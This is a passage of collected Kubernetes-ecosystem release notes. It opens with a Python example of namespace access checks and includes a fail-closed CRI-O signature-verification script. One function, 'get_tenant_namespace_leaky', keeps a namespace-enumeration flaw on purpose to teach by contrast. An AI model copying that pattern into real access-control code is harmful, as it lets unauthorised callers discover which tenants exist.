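    subjects: Tuple[Subject, ...]


@dataclass(frozen=True)
class Caller:
    user: str
    groups: FrozenSet[str] = frozenset()


class Store:
    """Minimal stand-in for the API server: namespaces plus RoleBindings."""

    def __init__(self, namespaces: Dict[str, dict], rolebindings: List[RoleBinding]):
        self.namespaces = namespaces
        self.rolebindings = rolebindings

    def list_rolebindings(self, namespace: str) -> List[RoleBinding]:
        # Namespace-scoped list, as in the fix; no cluster-wide scan.
        return [rb for rb in self.rolebindings if rb.namespace == namespace]


def subject_matches(subject: Subject, caller: Caller) -> bool:
    if subject.kind == "User":
        return subject.name == caller.user
    if subject.kind == "Group":
        return subject.name in caller.groups
    if subject.kind == "ServiceAccount":
        return caller.user == f"system:serviceaccount:{subject.namespace}:{subject.name}"
    return False


def has_access_to_namespace(store: Store, caller: Caller, namespace: str) -> bool:
    """True if any RoleBinding in the target namespace names the caller."""
    return any(subject_matches(s, caller)
               for rb in store.list_rolebindings(namespace)
               for s in rb.subjects)


def get_tenant_namespace(store: Store, caller: Caller, name: str) -> dict:
    """Hardened Get: missing and unauthorized both surface as NotFound."""
    if name not in store.namespaces or not has_access_to_namespace(store, caller, name):
        raise NotFound(name)
    return store.namespaces[name]


def get_tenant_namespace_leaky(store: Store, caller: Caller, name: str) -> dict:
    """Anti-pattern for contrast: distinct errors let a caller enumerate namespaces."""
    if name not in store.namespaces:
        raise NotFound(name)
    if not has_access_to_namespace(store, caller, name):
        raise Forbidden(name)
    return store.namespaces[name]


def filter_watch_events(store: Store, caller: Caller,
                        events: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """The Watch path applies the same check, so the event stream cannot leak names."""
    return [(kind, ns) for kind, ns in events
            if ns in store.namespaces and has_access_to_namespace(store, caller, ns)]


def build_sample_store() -> Store:
    # Constructed sample data for the example, not taken from any real cluster.
    return Store(
        namespaces={
            "tenant-alice": {"name": "tenant-alice", "labels": {"tenant": "alice"}},
            "tenant-bob": {"name": "tenant-bob", "labels": {"tenant": "bob"}},
        },
        rolebindings=[
            RoleBinding("tenant-alice", (Subject("User", "alice"),)),
            RoleBinding("tenant-bob", (Subject("Group", "team-bob"),)),
        ],
    )


def probe(getter, store: Store, caller: Caller, names: List[str]) -> List[str]:
    """Record the outcome a caller sees per name; the hardened getter gives one answer."""
    outcomes = []
    for name in names:
        try:
            getter(store, caller, name)
            outcomes.append("ok")
        except (NotFound, Forbidden) as exc:
            outcomes.append(type(exc).__name__)
    return outcomes
```

The `probe` helper is the test an engineer would run against the real endpoint: for a principal with no binding, an existing and a non-existent namespace must be indistinguishable in both status code and body.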

Features

  • feat(linstor): bump linstor-csi to v1.10.6 with Protocol-C dual-attach fix: Live migration of KubeVirt VMs on Protocol-A/B (async) DRBD volumes no longer fails with Protocol C required. linstor-csi v1.10.6 now installs a Protocol=C override on the resource-definition during dual-attach and reverts it on detach, so replicated-async StorageClasses and other Protocol-A/B resource groups support live migration without manual drbdadm adjust intervention. (@kvaps in #2496, backport #2505)

Fixes

  • fix(backups): move velero-configmap Role to velero chart: The backupstrategy-controller (a default package) declared a Role/RoleBinding scoped to the cozy-velero namespace for managing ResourceModifier ConfigMaps. On bundles where Velero was not enabled, that namespace did not exist and the HelmRelease failed with namespaces "cozy-velero" not found, blocking installation. The Role/RoleBinding now lives in the velero chart, so it is created only when velero is actually deployed. (@myasnikovdaniil in #2459, backport #2467)

  • fix(etcd): remove destructive post-upgrade cert-regeneration hook: The etcd chart ran a post-upgrade Helm hook on every upgrade that deleted etcd TLS Secrets (etcd-ca-tls, etcd-peer-ca-tls, etcd-client-tls, etcd-peer-tls, etcd-server-tls) and then deleted etcd pods, forcing cert-manager to re-issue the entire etcd CA chain. On clusters with Kamaji-managed tenant control planes this put every tenant kube-apiserver into CrashLoopBackOff until each DataStore was manually re-reconciled. The hook was a one-shot 2.6.0 → 2.6.1 migration that became a permanent footgun once chart versioning moved to 0.0.0+<git-hash> (always < 2.6.1 per semver) and after the underlying rotationPolicy: Always issue was fixed in 47d81f70. The hook is now removed entirely. (@myasnikovdaniil in #2462, backport #2511)

  • fix(kamaji): increase memory limits and add startup probe: The kamaji controller frequently entered CrashLoopBackOff due to OOMKills (exit 137) within ~20–25 seconds of startup, with the readiness probe failing while the controller was still finishing initialization. Memory limit raised from 500Mi to 512Mi, request from 100Mi to 256Mi, and a 60-second startup probe (12 attempts × 5s periods) is added so the controller has room to boot before liveness/readiness probes engage. (@IvanHunters in #2421, backport #2491)

Build

  • build(linstor): include linstor-gui in root image build target: The linstor-gui package (added in #2382) was never wired into the root Makefile's build: target, so CI never built or published the image. ghcr.io/cozystack/cozystack/linstor-gui returned NAME_UNKNOWN and values.yaml stayed pinned to tag: 2.3.0 without a digest. The missing build line is added so the next CI run publishes the image and the per-package Makefile digest-pins values.yaml automatically. (@myasnikovdaniil in #2498, backport #2518)

Contributors

Thanks to everyone who contributed to this patch release:

Full Changelog: v1.3.0...v1.3.1


Argo graduated

Kubernetes-native tools to run workflows, manage clusters, and do GitOps right.

v3.1.16

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.16/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.16/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed with cosign. Provenance meeting the SLSA Level 3 specification is generated for container images and CLI binaries. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

  • af7a36e: fix(server): Avoid error when attempting a second delete operation (cherry-pick #27495 for 3.1) (#27502) (@argo-cd-cherry-pick-bot[bot])

Dependency updates

  • c4499a3: chore(deps): bump SonarSource/sonarqube-scan-action from 5.2.0 to 8.0.0 (cherry-pick 27602 to 3.1) (#27607) (@dudinea)

Full Changelog: v3.1.15...v3.1.16

Shipwright sandbox

Shipwright Build release v0.19.3

Release changes since v0.19.2

To see a list of addressed vulnerabilities, please refer to #2141

Features

Fixes

API Changes

Docs

Misc

#2162 by @SaschaSchwarze0: Update github.com/tektoncd/pipeline from v1.9.1 to v1.9.2, update google.golang.org/grpc from v1.77.0 to v1.79.3, update github.com/go-git/go-git/v5 from v5.17.0 to v5.17.1

Longhorn incubating

Cloud-native distributed storage for Kubernetes

Longhorn v1.11.2

Longhorn v1.11.2 Release Notes

Longhorn 1.11.2 introduces several improvements and bug fixes that are intended to improve system quality, resilience, stability and security.

We welcome feedback and contributions to help continuously improve Longhorn.

For terminology and context on Longhorn releases, see Releases.

Important Fixes

This release includes several critical stability fixes.

Replica rebuild progress fix

Resolved an issue where replica rebuild progress could exceed 100% under unstable network conditions. Progress reporting is now capped at 100%.

For more details, see #12949.

CSIStorageCapacity scheduling enhancement

Introduced a new setting to control CSIStorageCapacity reporting. Previously, compute nodes without Longhorn disks incorrectly reported 0 capacity, breaking WaitForFirstConsumer scheduling. With this enhancement, capacity tracking can be configured to avoid rejecting compute nodes in separated compute/storage architectures.

For more details, see #12807.

Improvement

Manager memory optimization

Optimized longhorn-manager Pod informer caching to reduce cluster-wide memory usage.

For more details, see #12771.

Installation

Important

Ensure that your cluster is running Kubernetes v1.25 or later before installing Longhorn v1.11.2.

You can install Longhorn using a variety of tools, including Rancher, Kubectl, and Helm. For more information about installation methods and requirements, see Quick Installation in the Longhorn documentation.

Upgrade

Important

Ensure that your cluster is running Kubernetes v1.25 or later before upgrading from Longhorn v1.10.x or v1.11.0 to v1.11.2.

Important

Users on v1.11.0 who experienced the longhorn-instance-manager pod memory leaks (12575) are strongly encouraged to upgrade to v1.11.1 or later to receive the permanent fix for the proxy connection leaks.

Longhorn only allows upgrades from supported versions. For more information about upgrade paths and procedures, see Upgrade in the Longhorn documentation.

Post-Release Known Issues

For information about issues identified after this release, see Release-Known-Issues.

Resolved Issues in this release

Improvement

  • [BACKPORT][v1.11.2][IMPROVEMENT] Reduce longhorn-manager memory usage by optimizing cluster-wide informer caching 12819 - @hookak @roger-ryao

Bug

  • [BACKPORT][v1.11.2][BUG] Test case test_storage_capacity_aware_pod_scheduling fails 13006 - @yangchiu @bachmanity1
  • [BACKPORT][v1.11.2][BUG] Replica Auto-Balance Causes Infinite Replica Scheduling Loop 12928 - @yangchiu @shuo-wu
  • [BACKPORT][v1.11.2][BUG] CSIStorageCapacity reports 0 for compute nodes without Longhorn disks, breaking WaitForFirstConsumer scheduling 12918 - @chriscchien @bachmanity1
  • [BACKPORT][v1.11.2][BUG] Replica rebuild progress can go over 100% 12952 - @yangchiu @davidcheng0922
  • [BACKPORT][v1.11.2][BUG] Node exhaustion caused by backup inspect buildup induced due to NFS latency 12945 - @COLDTURNIP @roger-ryao
  • [BACKPORT][v1.11.2][BUG] Failed to collect health data for block disk (AIO) when disk path is a /dev/disk/by-id symlink 12911 - @yangchiu @hookak
  • [BACKPORT][v1.11.2][BUG] "snapshot becomes not ready to use" Warning events emitted during expected auto-cleanup after backup 12856 - @EpochBoy @yangchiu

Stability

Contributors

Athenz sandbox

Open source platform for X.509 certificate based service authentication and fine grained access control in dynamic infrastructures

Athenz v1.12.40 Release

What's Changed

  • [skip ci] Adding property description for athenz.zts.k8s_provider_gcp_attr_validator_factory_class by @psasidhar in #3322
  • disallow * member in roles if filters are configured by @havetisyan in #3327
  • extend user-cert support to allow timeout configuration based on role membership by @havetisyan in #3328
  • support role based configurable timeout for user id tokens by @havetisyan in #3331
  • [skip ci] update zts token documentation to document id token exchange requirements by @havetisyan in #3333
  • correct callback port to be int instead of string by @havetisyan in #3334
  • use of config.ClientTLSConfig for consistent tls config by @havetisyan in #3335
  • extend zts provider to read allowed members from a role by @havetisyan in #3332
  • add comments to clarify the use of cert issuer validator by @havetisyan in #3336
  • implement getRole method for roles provider in zts by @havetisyan in #3339
  • add single flight to ZTSClient token fetches by @t4niwa in #3330
  • update java/go/js dependencies to their latest releases by @havetisyan in #3341

New Contributors

Full Changelog: v1.12.39...v1.12.40

CRI-O graduated

CRI-O is a secure, performant, and stable Container Runtime Interface (CRI) implementation for the Kubelet to orchestrate Open Container Initiative (OCI) containers in production Kubernetes environments. CRI-O's scope is only targeted at Kubernetes, and thus can be performance optimized, rigorously tested and securely tuned for running containers, pods and images in Kubernetes clusters.

v1.35.3

CRI-O v1.35.3

The release notes have been generated for the commit range
v1.35.2...v1.35.3 on Tue, 05 May 2026 00:45:32 UTC.

Downloads

Download one of our static release bundles via our Google Cloud Bucket:

To verify the artifact signatures via cosign, run:

> export COSIGN_EXPERIMENTAL=1
> cosign verify-blob cri-o.amd64.v1.35.3.tar.gz \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.amd64.v1.35.3.tar.gz.bundle

To verify the bill of materials (SBOM) in SPDX format using the bom tool, run:

> tar xfz cri-o.amd64.v1.35.3.tar.gz
> bom validate -e cri-o.amd64.v1.35.3.tar.gz.spdx -d cri-o

Changelog since v1.35.2

Changes by Kind

Feature

  • CRI-O now continuously monitors CNI plugin health using the STATUS
    verb. If a plugin becomes unhealthy after initial readiness, the node
    is reported as NetworkReady=false, preventing pod scheduling on
    affected nodes. The node self-heals when the plugin recovers. (#9903, @haircommander)

Uncategorized

Dependencies

Added

Nothing has changed.

Changed

Removed

Nothing has changed.

CRI-O graduated

v1.34.8

CRI-O v1.34.8

The release notes have been generated for the commit range
v1.34.7...v1.34.8 on Tue, 05 May 2026 00:45:22 UTC.

Downloads

Download one of our static release bundles via our Google Cloud Bucket:

To verify the artifact signatures via cosign, run:

> export COSIGN_EXPERIMENTAL=1
> cosign verify-blob cri-o.amd64.v1.34.8.tar.gz \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.amd64.v1.34.8.tar.gz.bundle

To verify the bill of materials (SBOM) in SPDX format using the bom tool, run:

> tar xfz cri-o.amd64.v1.34.8.tar.gz
> bom validate -e cri-o.amd64.v1.34.8.tar.gz.spdx -d cri-o
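The same two-step check (cosign signature, then SBOM) appears for both v1.35.3 and v1.34.8 above. The script below wraps those steps so the result is fail-closed: the identity, issuer, repository and ref are pinned as constants, nothing is unpacked until the signature verifies, and a failed SBOM validation removes the unpacked tree. This is an added example, not CRI-O project tooling; it assumes cosign, bom and tar are on PATH and that the tarball, its .bundle and its .spdx document were downloaded into one directory (the .spdx file sitting next to the tarball is an assumption, as are the exit codes).

```shell
#!/bin/sh
# Added example (not CRI-O project code): fail-closed wrapper around the
# release-note verification steps for a CRI-O static bundle.

# Pinned signer identity taken from the release notes. Every release is signed
# by the obs.yml workflow in cri-o/packaging on its main branch, so the identity
# does not change between versions; only the artifact name does.
CRIO_CERT_IDENTITY="https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main"
CRIO_OIDC_ISSUER="https://token.actions.githubusercontent.com"

# bundle_name ARCH VERSION -> prints the tarball name, e.g. cri-o.amd64.v1.35.3.tar.gz
bundle_name() {
    printf 'cri-o.%s.%s.tar.gz\n' "$1" "$2"
}

# verify_crio_bundle ARCH VERSION [DIR]
# Exit codes (assumed for this example): 0 verified, 2 missing tool,
# 3 missing input file, 4 signature rejected, 5 SBOM rejected.
verify_crio_bundle() {
    arch=$1; ver=$2; dir=${3:-.}
    tarball=$(bundle_name "$arch" "$ver")

    # Refuse to proceed if any required tool is absent; a skipped check must not
    # silently look like a passed check.
    for tool in cosign bom tar; do
        command -v "$tool" >/dev/null 2>&1 || { echo "missing tool: $tool" >&2; return 2; }
    done
    for f in "$tarball" "$tarball.bundle" "$tarball.spdx"; do
        [ -f "$dir/$f" ] || { echo "missing file: $dir/$f" >&2; return 3; }
    done

    # Signature first. Identity, issuer, repository and ref are all pinned, so a
    # valid Sigstore signature issued to any other workflow is rejected.
    ( cd "$dir" && COSIGN_EXPERIMENTAL=1 cosign verify-blob "$tarball" \
        --certificate-identity "$CRIO_CERT_IDENTITY" \
        --certificate-oidc-issuer "$CRIO_OIDC_ISSUER" \
        --certificate-github-workflow-repository cri-o/packaging \
        --certificate-github-workflow-ref refs/heads/main \
        --bundle "$tarball.bundle" ) \
        || { echo "signature rejected for $tarball" >&2; return 4; }

    # Only a verified tarball is unpacked; bom then checks the unpacked files
    # against the SPDX document. On failure the partial tree is removed.
    ( cd "$dir" && tar xfz "$tarball" && bom validate -e "$tarball.spdx" -d cri-o ) \
        || { echo "SBOM validation failed; removing $dir/cri-o" >&2; rm -rf "$dir/cri-o"; return 5; }

    echo "verified $tarball"
    return 0
}

# Usage: verify_crio_bundle amd64 v1.35.3 ./downloads
```

Run it from the directory holding the downloads, or pass that directory as the third argument; a non-zero exit means the bundle must not be installed.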

Changelog since v1.34.7

Changes by Kind

Dependency-Change

Uncategorized

  • Add container_runtime_crio_default_runtime metric to display which default runtime the node is configured to use (#9899, @openshift-cherrypick-robot)
  • Add min_injected_gomaxprocs option, which allows a user to specify GOMAXPROCS in every container CRI-O creates. The config field itself is an integer that represents the floor of GOMAXPROCS. CRI-O will inject max(floor, cpu.request), if the pod is not a guaranteed pod or is part of a partitioned workload (#9886, @haircommander)

Dependencies

Added

Nothing has changed.

Changed

Removed

Nothing has changed.